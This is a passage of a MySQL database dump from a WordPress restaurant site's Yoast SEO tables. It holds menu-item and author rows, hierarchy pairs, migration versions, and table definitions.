19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2551,NULL,NULL,4571,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2552,NULL,NULL,4572,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2553,NULL,NULL,4573,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2554,NULL,NULL,4574,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2555,NULL,NULL,4575,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2556,NULL,NULL,4576,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2557,NULL,NULL,4577,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2558,NULL,NULL,4578,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2559,NULL,NULL,4579,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2560,NULL,NULL,4580,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2561,NULL,NULL,4581,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2562,NULL,NULL,4582,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2563,NULL,NULL,4583,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2564,NULL,NULL,4584,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2565,NULL,NULL,4585,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2566,NULL,NULL,4586,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2567,NULL,NULL,4587,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2568,NULL,NULL,4588,'post','nav_menu_item',1,3061,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2569,NULL,NULL,4589,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2570,NULL,NULL,4590,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2571,NULL,NULL,4591,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2572,NULL,NULL,4592,'post','nav_menu_item',1,3061,NULL,NULL,'FIve Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2573,NULL,NULL,4593,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2574,NULL,NULL,4594,'post','nav_menu_item',1,3061,NULL,NULL,'Six Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2575,'https://www.ristorantesolymar.it/vecchio/author/attika/','55:0db38dd4ddb2be2e1312ef2c5fa86615',71,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/b34652c08ec90a207ad6775e3e2ea969?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/b34652c08ec90a207ad6775e3e2ea969?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2021-01-23 20:00:51','2021-02-03 18:00:26',1,NULL,NULL,NULL,NULL,0,NULL),(2576,NULL,NULL,4595,'post','postman_sent_mail',1,0,NULL,NULL,'[Sol Y Mar] New User Registration','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 20:00:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2582,NULL,NULL,4605,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-29 00:27:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2583,NULL,NULL,4606,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-29 12:23:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2584,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente/','121:a79b7590e9c8cf090e0af6e63cb75a66',4608,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-31 15:22:40','2021-01-31 20:22:40',1,NULL,NULL,NULL,NULL,0,NULL);
/*!40000 ALTER TABLE `wp_yoast_indexable` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_indexable_hierarchy`
--

DROP TABLE IF EXISTS `wp_yoast_indexable_hierarchy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable_hierarchy` (
  `indexable_id` int(11) unsigned NOT NULL DEFAULT '0',
  `ancestor_id` int(11) unsigned NOT NULL DEFAULT '0',
  `depth` int(11) unsigned DEFAULT NULL,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  PRIMARY KEY (`indexable_id`,`ancestor_id`),
  KEY `indexable_id` (`indexable_id`),
  KEY `ancestor_id` (`ancestor_id`),
  KEY `depth` (`depth`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_indexable_hierarchy`
--

LOCK TABLES `wp_yoast_indexable_hierarchy` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable_hierarchy` VALUES (52,42,2,1),(52,41,1,1),(54,2,1,1),(55,2,1,1),(62,43,1,1),(63,43,1,1),(64,43,1,1),(65,43,1,1),(66,43,1,1),(67,43,1,1),(69,68,1,1),(71,70,1,1),(79,78,1,1),(80,14,1,1),(83,13,1,1),(117,116,1,1),(118,11,1,1),(120,119,1,1),(121,8,1,1),(122,7,1,1),(124,50,1,1),(125,45,1,1),(126,45,2,1),(126,125,1,1),(127,6,1,1),(128,5,1,1),(130,42,1,1),(46,42,1,1),(133,42,1,1),(134,42,1,1),(135,42,1,1),(136,45,1,1),(137,45,1,1),(138,45,1,1),(139,45,1,1),(140,45,1,1),(141,45,1,1),(142,45,1,1),(143,45,1,1),(144,45,1,1),(49,42,1,1),(146,45,1,1),(277,45,1,1),(148,45,1,1),(149,45,1,1),(150,45,1,1),(151,45,1,1),(47,45,1,1),(44,45,1,1),(324,43,1,1),(198,45,1,1),(197,45,1,1),(199,45,1,1),(325,43,1,1),(326,43,1,1),(327,43,1,1),(328,43,1,1),(329,43,1,1),(330,43,1,1),(331,43,1,1),(332,43,1,1),(333,43,1,1),(334,43,1,1),(335,43,1,1),(336,43,1,1),(337,43,1,1),(338,43,1,1),(339,43,1,1),(340,43,1,1),(341,43,1,1),(342,43,1,1),(343,43,1,1),(344,43,1,1),(345,43,1,1),(346,43,1,1),(347,43,1,1),(348,43,1,1),(349,43,1,1),(350,43,1,1),(351,43,1,1),(436,434,1,1),(438,434,1,1),(440,434,1,1),(444,434,1,1),(757,746,1,1),(758,746,1,1),(759,746,1,1),(774,773,1,1),(775,773,1,1),(776,773,1,1),(777,773,1,1),(778,773,1,1),(779,773,1,1),(781,751,1,1),(782,751,1,1),(783,751,1,1),(784,751,1,1),(785,751,1,1),(786,751,1,1),(787,751,1,1),(788,751,1,1),(789,751,1,1),(790,751,1,1),(792,751,1,1),(793,751,1,1),(794,751,1,1),(795,751,1,1),(796,751,1,1),(797,773,1,1),(798,773,1,1),(799,773,1,1),(800,751,1,1),(801,751,1,1),(802,751,1,1),(803,751,1,1),(804,751,1,1),(805,751,1,1),(806,751,1,1),(807,751,1,1),(808,751,1,1),(809,751,1,1),(812,773,1,1),(813,773,1,1),(814,773,1,1),(815,751,1,1),(816,751,1,1),(817,751,1,1),(819,773,1,1),(820,773,1,1),(821,773,1,1),(841,773,1,1),(842,773,1,1),(993,746,1,1),(994,746,1,1),(995,746,1,1),(996,746,1,1),(997,746,1,1),(998,746,1,1),(999,746,1,1),(1023,773,1,1),(1024,773,1,1),(1025,773,1,1),(1032,751,1,1),(1033,751,1,1),(1034,751,1,1),(1035,751,1,1),(1036,751,1,1),(1037,751,1,1),(1038,751,1,1),(1039,751,1,1),(1040,751,1,1),(1041,751,1,1),(1042,751,1,1),(1043,751,1,1),(1044,751,1,1),(1045,751,1,1),(1046,751,1,1),(1047,751,1,1),(1048,751,1,1),(1049,751,1,1),(1050,751,1,1),(1051,751,1,1),(1052,751,1,1),(1053,751,1,1),(1054,751,1,1),(1055,751,1,1),(1056,751,1,1),(1057,751,1,1),(1065,751,1,1),(1066,751,1,1),(1067,751,1,1),(1068,751,1,1),(1071,751,1,1),(1072,751,1,1),(1073,751,1,1),(1074,751,1,1),(1079,773,1,1),(1080,773,1,1),(1081,773,1,1),(1092,751,1,1),(1093,751,1,1),(1094,751,1,1),(1095,751,1,1),(1096,751,1,1),(1097,751,1,1),(1098,751,1,1),(1099,751,1,1),(1109,751,1,1),(1110,751,1,1),(1111,751,1,1),(1112,751,1,1),(1113,751,1,1),(1114,751,1,1),(1129,751,1,1),(1130,751,1,1),(1136,773,1,1),(1137,773,1,1),(1138,773,1,1),(1139,773,1,1),(1140,773,1,1),(1141,773,1,1),(1142,773,1,1),(1143,773,1,1),(1144,773,1,1),(1145,773,1,1),(1146,773,1,1),(1147,773,1,1),(1148,773,1,1),(1149,751,1,1),(1150,751,1,1),(1151,751,1,1),(1152,751,1,1),(1153,751,1,1),(1154,751,1,1),(1155,773,1,1),(1156,773,1,1),(1157,773,1,1),(1158,773,1,1),(1159,773,1,1),(1160,773,1,1),(1161,773,1,1),(1162,773,1,1),(1163,773,1,1),(1164,773,1,1),(1165,773,1,1),(1168,773,1,1),(1169,773,1,1),(1170,773,1,1),(1171,773,1,1),(1176,42,1,1),(1177,42,1,1),(1178,42,1,1),(1179,42,1,1),(1180,42,1,1),(1181,42,1,1),(1182,42,1,1),(1184,45,1,1),(1185,45,1,1),(1186,45,1,1),(1187,45,1,1),(1188,45,1,1),(1189,45,1,1),(1190,45,1,1),(1191,45,1,1),(1192,45,1,1),(1193,45,1,1),(1194,45,1,1),(1195,45,1,1),(1196,45,1,1),(1197,45,1,1),(1198,45,1,1),(1199,45,1,1),(1200,45,1,1),(1282,751,1,1),(1215,773,1,1),(1283,751,1,1),(1299,746,1,1),(1300,746,1,1),(1301,746,1,1),(1302,746,1,1),(1303,746,1,1),(1304,746,1,1),(1305,746,1,1),(1329,773,1,1),(1330,773,1,1),(1331,773,1,1),(1338,751,1,1),(1339,751,1,1),(1340,751,1,1),(1341,751,1,1),(1342,751,1,1),(1343,751,1,1),(1344,751,1,1),(1345,751,1,1),(1346,751,1,1),(1347,751,1,1),(1348,751,1,1),(1349,751,1,1),(1350,751,1,1),(1351,751,1,1),(1352,751,1,1),(1353,751,1,1),(1354,751,1,1),(1355,751,1,1),(1356,751,1,1),(1357,751,1,1),(1358,751,1,1),(1359,751,1,1),(1360,751,1,1),(1361,751,1,1),(1362,751,1,1),(1363,751,1,1),(1371,751,1,1),(1372,751,1,1),(1373,751,1,1),(1374,751,1,1),(1377,751,1,1),(1378,751,1,1),(1379,751,1,1),(1380,751,1,1),(1385,773,1,1),(1386,773,1,1),(1387,773,1,1),(1398,751,1,1),(1399,751,1,1),(1400,751,1,1),(1401,751,1,1),(1402,751,1,1),(1403,751,1,1),(1404,751,1,1),(1405,751,1,1),(1415,751,1,1),(1416,751,1,1),(1417,751,1,1),(1418,751,1,1),(1419,751,1,1),(1420,751,1,1),(1435,751,1,1),(1436,751,1,1),(1442,773,1,1),(1443,773,1,1),(1444,773,1,1),(1445,773,1,1),(1446,773,1,1),(1447,773,1,1),(1448,773,1,1),(1449,773,1,1),(1450,773,1,1),(1451,773,1,1),(1452,773,1,1),(1453,773,1,1),(1454,773,1,1),(1455,751,1,1),(1456,751,1,1),(1457,751,1,1),(1458,751,1,1),(1459,751,1,1),(1460,751,1,1),(1461,773,1,1),(1462,773,1,1),(1463,773,1,1),(1464,773,1,1),(1465,773,1,1),(1466,773,1,1),(1467,773,1,1),(1468,773,1,1),(1469,773,1,1),(1470,773,1,1),(1471,773,1,1),(1474,773,1,1),(1475,773,1,1),(1476,773,1,1),(1477,773,1,1),(1627,751,1,1),(1628,751,1,1),(1644,746,1,1),(1645,746,1,1),(1646,746,1,1),(1647,746,1,1),(1648,746,1,1),(1649,746,1,1),(1650,746,1,1),(1674,773,1,1),(1675,773,1,1),(1676,773,1,1),(1683,751,1,1),(1684,751,1,1),(1685,751,1,1),(1686,751,1,1),(1687,751,1,1),(1688,751,1,1),(1689,751,1,1),(1690,751,1,1),(1691,751,1,1),(1692,751,1,1),(1693,751,1,1),(1694,751,1,1),(1695,751,1,1),(1696,751,1,1),(1697,751,1,1),(1698,751,1,1),(1699,751,1,1),(1700,751,1,1),(1701,751,1,1),(1702,751,1,1),(1703,751,1,1),(1704,751,1,1),(1705,751,1,1),(1706,751,1,1),(1707,751,1,1),(1708,751,1,1),(1716,751,1,1),(1717,751,1,1),(1718,751,1,1),(1719,751,1,1),(1722,751,1,1),(1723,751,1,1),(1724,751,1,1),(1725,751,1,1),(1730,773,1,1),(1731,773,1,1),(1732,773,1,1),(1743,751,1,1),(1744,751,1,1),(1745,751,1,1),(1746,751,1,1),(1747,751,1,1),(1748,751,1,1),(1749,751,1,1),(1750,751,1,1),(1760,751,1,1),(1761,751,1,1),(1762,751,1,1),(1763,751,1,1),(1764,751,1,1),(1765,751,1,1),(1780,751,1,1),(1781,751,1,1),(1787,773,1,1),(1788,773,1,1),(1789,773,1,1),(1790,773,1,1),(1791,773,1,1),(1792,773,1,1),(1793,773,1,1),(1794,773,1,1),(1795,773,1,1),(1796,773,1,1),(1797,773,1,1),(1798,773,1,1),(1799,773,1,1),(1800,751,1,1),(1801,751,1,1),(1802,751,1,1),(1803,751,1,1),(1804,751,1,1),(1805,751,1,1),(1806,773,1,1),(1807,773,1,1),(1808,773,1,1),(1809,773,1,1),(1810,773,1,1),(1811,773,1,1),(1812,773,1,1),(1813,773,1,1),(1814,773,1,1),(1815,773,1,1),(1816,773,1,1),(1819,773,1,1),(1820,773,1,1),(1821,773,1,1),(1822,773,1,1),(1890,751,1,1),(1891,751,1,1),(1907,746,1,1),(1908,746,1,1),(1909,746,1,1),(1910,746,1,1),(1911,746,1,1),(1912,746,1,1),(1913,746,1,1),(1937,773,1,1),(1938,773,1,1),(1939,773,1,1),(1946,751,1,1),(1947,751,1,1),(1948,751,1,1),(1949,751,1,1),(1950,751,1,1),(1951,751,1,1),(1952,751,1,1),(1953,751,1,1),(1954,751,1,1),(1955,751,1,1),(1956,751,1,1),(1957,751,1,1),(1958,751,1,1),(1959,751,1,1),(1960,751,1,1),(1961,751,1,1),(1962,751,1,1),(1963,751,1,1),(1964,751,1,1),(1965,751,1,1),(1966,751,1,1),(1967,751,1,1),(1968,751,1,1),(1969,751,1,1),(1970,751,1,1),(1971,751,1,1),(1979,751,1,1),(1980,751,1,1),(1981,751,1,1),(1982,751,1,1),(1985,751,1,1),(1986,751,1,1),(1987,751,1,1),(1988,751,1,1),(1993,773,1,1),(1994,773,1,1),(1995,773,1,1),(2006,751,1,1),(2007,751,1,1),(2008,751,1,1),(2009,751,1,1),(2010,751,1,1),(2011,751,1,1),(2012,751,1,1),(2013,751,1,1),(2023,751,1,1),(2024,751,1,1),(2025,751,1,1),(2026,751,1,1),(2027,751,1,1),(2028,751,1,1),(2043,751,1,1),(2044,751,1,1),(2050,773,1,1),(2051,773,1,1),(2052,773,1,1),(2053,773,1,1),(2054,773,1,1),(2055,773,1,1),(2056,773,1,1),(2057,773,1,1),(2058,773,1,1),(2059,773,1,1),(2060,773,1,1),(2061,773,1,1),(2062,773,1,1),(2063,751,1,1),(2064,751,1,1),(2065,751,1,1),(2066,751,1,1),(2067,751,1,1),(2068,751,1,1),(2069,773,1,1),(2070,773,1,1),(2071,773,1,1),(2072,773,1,1),(2073,773,1,1),(2074,773,1,1),(2075,773,1,1),(2076,773,1,1),(2077,773,1,1),(2078,773,1,1),(2079,773,1,1),(2082,773,1,1),(2083,773,1,1),(2084,773,1,1),(2085,773,1,1),(2379,751,1,1),(2380,751,1,1),(2396,746,1,1),(2397,746,1,1),(2398,746,1,1),(2399,746,1,1),(2400,746,1,1),(2401,746,1,1),(2402,746,1,1),(2426,773,1,1),(2427,773,1,1),(2428,773,1,1),(2435,751,1,1),(2436,751,1,1),(2437,751,1,1),(2438,751,1,1),(2439,751,1,1),(2440,751,1,1),(2441,751,1,1),(2442,751,1,1),(2443,751,1,1),(2444,751,1,1),(2445,751,1,1),(2446,751,1,1),(2447,751,1,1),(2448,751,1,1),(2449,751,1,1),(2450,751,1,1),(2451,751,1,1),(2452,751,1,1),(2453,751,1,1),(2454,751,1,1),(2455,751,1,1),(2456,751,1,1),(2457,751,1,1),(2458,751,1,1),(2459,751,1,1),(2460,751,1,1),(2468,751,1,1),(2469,751,1,1),(2470,751,1,1),(2471,751,1,1),(2474,751,1,1),(2475,751,1,1),(2476,751,1,1),(2477,751,1,1),(2482,773,1,1),(2483,773,1,1),(2484,773,1,1),(2495,751,1,1),(2496,751,1,1),(2497,751,1,1),(2498,751,1,1),(2499,751,1,1),(2500,751,1,1),(2501,751,1,1),(2502,751,1,1),(2512,751,1,1),(2513,751,1,1),(2514,751,1,1),(2515,751,1,1),(2516,751,1,1),(2517,751,1,1),(2532,751,1,1),(2533,751,1,1),(2539,773,1,1),(2540,773,1,1),(2541,773,1,1),(2542,773,1,1),(2543,773,1,1),(2544,773,1,1),(2545,773,1,1),(2546,773,1,1),(2547,773,1,1),(2548,773,1,1),(2549,773,1,1),(2550,773,1,1),(2551,773,1,1),(2552,751,1,1),(2553,751,1,1),(2554,751,1,1),(2555,751,1,1),(2556,751,1,1),(2557,751,1,1),(2558,773,1,1),(2559,773,1,1),(2560,773,1,1),(2561,773,1,1),(2562,773,1,1),(2563,773,1,1),(2564,773,1,1),(2565,773,1,1),(2566,773,1,1),(2567,773,1,1),(2568,773,1,1),(2571,773,1,1),(2572,773,1,1),(2573,773,1,1),(2574,773,1,1),(36,35,1,1),(48,0,0,1),(1223,0,0,1),(51,0,0,1),(450,0,0,1),(2600,0,0,1),(24,0,0,1),(749,0,0,1),(1621,0,0,1),(895,0,0,1),(1220,0,0,1),(14,0,0,1),(1224,0,0,1),(23,0,0,1),(2601,0,0,1),(747,0,0,1),(912,0,0,1),(2602,0,0,1),(2603,0,0,1),(2604,0,0,1),(177,0,0,1),(172,0,0,1),(10,0,0,1),(2605,0,0,1),(160,0,0,1),(2606,0,0,1),(437,0,0,1),(2607,0,0,1),(2608,0,0,1),(2609,0,0,1),(2610,0,0,1),(2611,0,0,1),(2612,0,0,1),(2613,0,0,1),(6,0,0,1),(2614,0,0,1),(2615,0,0,1),(2616,0,0,1),(445,0,0,1),(2617,0,0,1),(2618,0,0,1),(2619,0,0,1),(2620,0,0,1),(2621,0,0,1),(2622,0,0,1),(2623,0,0,1),(2624,0,0,1),(2625,0,0,1),(2626,0,0,1),(2627,0,0,1),(2628,0,0,1),(2629,0,0,1),(2630,0,0,1),(2631,0,0,1),(2632,0,0,1),(2633,0,0,1);
/*!40000 ALTER TABLE `wp_yoast_indexable_hierarchy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_migrations`
--

DROP TABLE IF EXISTS `wp_yoast_migrations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_migrations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `version` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_wp_yoast_migrations_version` (`version`)
) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_migrations`
--

LOCK TABLES `wp_yoast_migrations` WRITE;
/*!40000 ALTER TABLE `wp_yoast_migrations` DISABLE KEYS */;
INSERT INTO `wp_yoast_migrations` VALUES (1,'20171228151840'),(2,'20171228151841'),(3,'20190529075038'),(4,'20191011111109'),(5,'20200408101900'),(6,'20200420073606'),(7,'20200428123747'),(8,'20200428194858'),(9,'20200429105310'),(10,'20200430075614'),(11,'20200430150130'),(12,'20200507054848'),(13,'20200513133401'),(14,'20200609154515'),(15,'20200702141921'),(16,'20200616130143'),(17,'20200728095334'),(18,'20200617122511'),(19,'20201202144329'),(20,'20201216124002'),(21,'20201216141134');
/*!40000 ALTER TABLE `wp_yoast_migrations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_primary_term`
--

DROP TABLE IF EXISTS `wp_yoast_primary_term`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_primary_term` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) DEFAULT NULL,
  `term_id` bigint(20) DEFAULT NULL,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `post_taxonomy` (`post_id`,`taxonomy`),
  KEY `post_term` (`post_id`,`term_id`)
) ENGINE=MyISAM AUTO_INCREMENT=43 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_primary_term`
--

LOCK TABLES `wp_yoast_primary_term` WRITE;
